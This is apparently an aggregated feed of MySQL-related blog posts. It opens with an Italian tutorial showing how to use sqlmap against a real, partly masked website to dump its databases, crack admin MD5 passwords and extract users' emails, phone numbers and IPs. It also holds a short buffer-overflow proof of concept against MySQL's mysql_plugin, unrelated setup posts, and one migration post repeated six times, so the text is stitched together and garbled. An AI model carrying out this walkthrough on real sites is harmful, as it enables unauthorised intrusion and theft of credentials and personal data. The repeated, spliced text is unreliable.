Vedi anche: 7 tools per pentesting su Ubuntu, come installarli

La SQL Injection è una pratica molto diffusa tra gli hackers, quasi tutti i siti che vengono gestiti da database SQL sono vulnerabili alla SQL Injection (o Query Injection), viene riconosciuta dai link che terminano con *.php?id=1(l’1 può cambiare) dove “id” è la variabile vulnerabile, ma attenzione, non tutte sono vulnerabili. Per spiegare meglio cos’è l’SQL injection dovremmo stare qui a parlare per un pochino, quindi sorvoliamo e passiamo a SQLMap

Avviamo un terminale in modalità root attraverso il comando

sudo -s

poi navighiamo nella cartella dove è situato SQLMap attraverso la funzione

cd

e digitiamo

./sqlmap.py

per aprire SQLMap

Questa è la struttura (Sintassi) di SQLMap:

./sqlmap.py  (-u sta per URL) <<www.sito.it/*.php?id=*>>   (per mostrare a schermo)

prenderò come sito target un sito un po’ datato (che offuschiamo per ovvi motivi):  http://www.p*****b.com/s*********e.php?id=1
(dovrebbe essere vulnerabile)

quindi come prima fase eseguiamo il fingerprint del sito attraverso la funzione -u

quindi eseguiamo questo comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1

Fingerprinting in corso… “Il parametro “id=1″ dovrebbe essere vulnerabile”

Esito positivo: parametro id=1 vulnerabile, database utilizzato: MySQL Payload = id=1

Adesso che sappiamo (quasi) tutto su questo sito, dobbiamo sapere i nomi dei database, quindi utilizzeremo questo comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 --dbs

(–dbs sta per databases)

una volta ottenuti i nomi dei database, ne selezioneremo uno attraverso l’opzione -D quindi eseguiremo in ordine questi 2 comandi:

./sqlmap.py -u http://www.p*****b.com/s********e.php?id=1 -D p*****b

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --columns --threads 10 --dump

Spieghiamo cosa facciamo con i due comandi:
-Con il primo chiediamo a SQLMap di analizzare il database
-Con il secondo chiediamo a SQLMap di stamparci a schermo tutto il contenuto del database (tabelle, colonne), di impostare 10 threads per una ricerca più rapida.
(Guarda foto)

Una volta terminata la scansione, trovate le password ci chiederà di craccare proprio quest’ultime, perchè purtroppo le password sono criptate attraverso MD5, quindi premiamo “y” per confermare l’operazione e definiamo il dizionario che vogliamo usare, io ho usato quello classico di SQLMap, premendo “1″, poi ci chiedera se vogliamo usare dei suffissi, ora non ci soffermiamo sui suffissi, noi premiamo “N” ed ecco che la procedura di cracking inizierà. Se non riesce a craccare le password ce le scrive in una tabella(le password sono criptate)  con i nomi degli ADMIN del sito, che dovremo decriptare da soli con programmi come hashcat

Ecco la procedura di cracking:

Altre password trovate, come vedete sono scritte in formato MD5, cioè criptate e ci chiede ancora una volta di decriptarle.

Questi sono dei dati che ha estrapolato ma non sò di preciso cosa sono…

Una volta ottenute le password decriptate dobbiamo solo cercare il pannello di controllo ADMIN del sito

Con SQLMap non possiamo solamente trovare le password, possiamo anche estrapolare dati sensibili come EMails, o addirittura numeri di telefono, indirizzi IP e altro (come possiamo vedere in foto)

possiamo estrapolare dati di questo tipo, chiedendo a SQLMap di mostrarci solamente le tabelle che a loro volta contengono le colonne contenenti i dati, quindi gli dobbiamo dare il seguente comando per vedere tutte le tabelle disponibili

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b --tables --dump

Questo comando invece serve a selezionare una determinata tabella e la colonna (il contenuto della colonna sinistra per intenderci), dobbiamo individuare tabelle come “wp_users” o “user_data” o altro, e colonne come “emails” “phone_number” “ip” “last_ip” ecc…
Tutto questo si svolge con il comando:

./sqlmap.py -u http://www.p*****b.com/s*********e.php?id=1 -D p*****b -T (nome della tabella scelta) -C (nome della colonna scelta all'interno della tabella (la colonna sinistra)) --threads 10 --dump

Spero che questa guida vi sia piaciuta!

Il post [Pentesting]SQLMap: Hackerare un sito con SQLmap è stato pubblicato su InTheBit – Il Blog sulla Tecnologia che alimenta le tue passioni!.

Se qualcuno sta pensando che con l’avvento del cloud, le architetture scalabili, la morte del client-server, l’inclusione di MariaDB come database di default in Red Hat Enterprise Linux 7, ed altre sentenze … [Visita il sito per leggere tutto l'articolo]

LAMP è una combinazione di prodotti Open Source (Linux Apache MariaDB Php). Questo ci permette di avere a disposizione una piattaforma Linux con un Web Server Apache, un database mysql con mariaDB e PHP. Avere a disposizione questi stack ci da la possibilità di ospitare numerose applicazioni WEB come ad esempio WordPress per il nostro… Read More »

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

EXAMPLE POC:
root@mysqlserver ~# /usr/bin/mysql_plugin `perl -e 'print ?X? x 9000'`
 
*** buffer overflow detected ***: mysql_plugin terminated
======= Backtrace: =========
...
 
7fac520e0000-7fac520f5000 rw-p 00000000 00:00 0 Aborted (core dumped)

More Info:

https://packetstormsecurity.com/files/133888/MySQL-5.6.24-Buffer-Overflow.html

http://www.securityfocus.com/archive/1/536630

(2)

In questa guida vedremo come creare un Cluster MariaDB dove tutti i nodi appartenenti al cluster sono Master. La soluzione di un Cluster Master-Master fa si che tutti i nodi siano replicati costantemente e accessibili in lettura e scrittura contemporaneamente. Molto spesso si utilizza per poter poi bilanciare le richieste MySQL ottimizzando così le performance dei singoli nodi, ridurre i downtime e distribuire il carico delle richieste. Vediamo dunque come realizzare tutto ciò su...

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

In questa guida vedremo come creare un Cluster MariaDB dove tutti i nodi appartenenti al cluster sono Master. La soluzione di un Cluster Master-Master fa si che tutti i nodi siano replicati costantemente e accessibili in lettura e scrittura contemporaneamente. Molto spesso si utilizza per poter poi bilanciare le richieste MySQL ottimizzando così le performance … [Read more…]

Owncloud 9 Apache Mysql su Raspberry Pi 3 e Raspbian. Io su Raspberry Pi 3, ho un server Webdav e mi trovo bene, qua la guida. ma ho voluto provare Owncloud, poichè è molto più personalizzabile, e ti permette di condividere link, con password e data di scadenza. Io ho utilizzato come disco esterno una pen drive da 128G, formattata in NTFS, ma si può utilizzare anche un hard disk esterno, possibilmente alimentato. 

sudo mkdir /media/usb-hdd

identificare la chiavetta con:

sudo tail -f /var/log/messages

oppure:

sudo fdisk -l

conoscere UUID per procedere con il mount automatico:

sudo blkid /dev/sda1

il comando sopra restituirà qualcosa del genere:

/dev/sda1: UUID="10C67902162A661E" TYPE="ntfs" PARTUUID="eaf9ab2e-01"

quindi configurare fstab:

sudo nano /etc/fstab

che dovrebbe essere come sotto:

UUID=10C67902162A661E /media/usb-hdd/ ntfs-3g permissions,defaults,auto

poi:

sudo reboot

Installazione di Owncloud ed i servizi necessari:

wget -nv https://download.owncloud.org/download/repositories/stable/Debian_8.0/Release.key -O Release.key
sudo apt-key add - < Release.key
sudo sh -c "echo 'deb http://download.owncloud.org/download/repositories/stable/Debian_8.0/ /' >> /etc/apt/sources.list.d/owncloud.list"
sudo apt-get update && sudo apt-get install owncloud

verrà chiesto di scegliere una password per mysql.

Configurazione Mysql:

sudo mysql -u root -p

inserire la password di mysql, e poi i 4 comandi sotto, scegliendo Utente e Password per l'utente owncloud:

CREATE DATABASE owncloud;
GRANT ALL PRIVILEGES ON owncloud.* TO USER@localhost IDENTIFIED BY 'PASSWORD';
FLUSH PRIVILEGES;
exit

riavviare mysql:

sudo service mysql restart

Web Server Apache2 con SSL:

sudo openssl genrsa -out server.key 4096
sudo openssl req -new -key server.key -out server.csr

ci saranno alcune voci da riempire, ma quella più importante è COMMON NAME, che io ho fatto puntare al mio hostname DynDNS per l'accesso da remoto:

Owncloud 9 Apache Mysql su Raspberry Pi 3 e Raspbian

DocumentRoot /var/www/owncloud

L’articolo Owncloud 9 Apache Mysql su Raspberry Pi 3 e Raspbian sembra essere il primo su Edmond's Weblog.

L’articolo Accesso a PhpMyAdmin con MySQL 5.7 sembra essere il primo su RedBlue's Blog.

L’articolo Accesso a PhpMyAdmin con MySQL 5.7 sembra essere il primo su RedBlue's Blog.

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');  

Yes it happened. After a decade this blog moved from Drupal to Ghost !

When I started grigio.org the word “blog” was cool and the social networks weren’t so intrusive, but the world changed and also I changed.

The migration drupal2ghost json went quite smooth, thanks to the Ghost import errors I’ve also learnt why some js was broken in Drupal XD. The autocompletion plugin injected some trash in the db

At the beginning this blog was mainly in Italian language and it was on GNU/Linux from a user perspective, now it more in English and about web development and open source software. The year of Linux on the desktop didn’t happen (Anyway I’m writing this post on ubuntu using a chromebook).

So.. why moving from Drupal to Ghost?

Google started to warn that non-mobile optimized sites will be penalized in the search. I could put a mobile optimized theme for Drupal, but the truth is that I just what to write something in markdown sometimes, and Ghost is the easiest way to do it.

I did the best to migrate all the slug to Ghost, but I know some links will be 404 not found. Yes, the comments aren’t supported but I bet that if you are smart enough and you aren’t a spammer you’ll find anyway a way to communicate with me.

Why a blog in 2015 ?

There are the Social Networks (Facebook, Twitter, Google+), free services like Medium..

In conclusion, just 2 words:

• decentralization: to continue to have the freedom and the knowledge, the backbone of the technology must be replicable and possibly open source.
• control: I’ve seen too many contents disappeared on free services because they weren’t economically sustenaible or removed on Facebook because they decided so.
  And the unique way to avoid it is to DIY, and host a blog by yourself.

I plan to release on Github the drupal2ghost.js script, it should work on Drupal 5, 6, 7 but I can’t guarantee because very weird things can happen.

..at some point, who know why, the ids in the Mysql db started to be filled with 00000, then went back to the normal sequence.

alert('bye');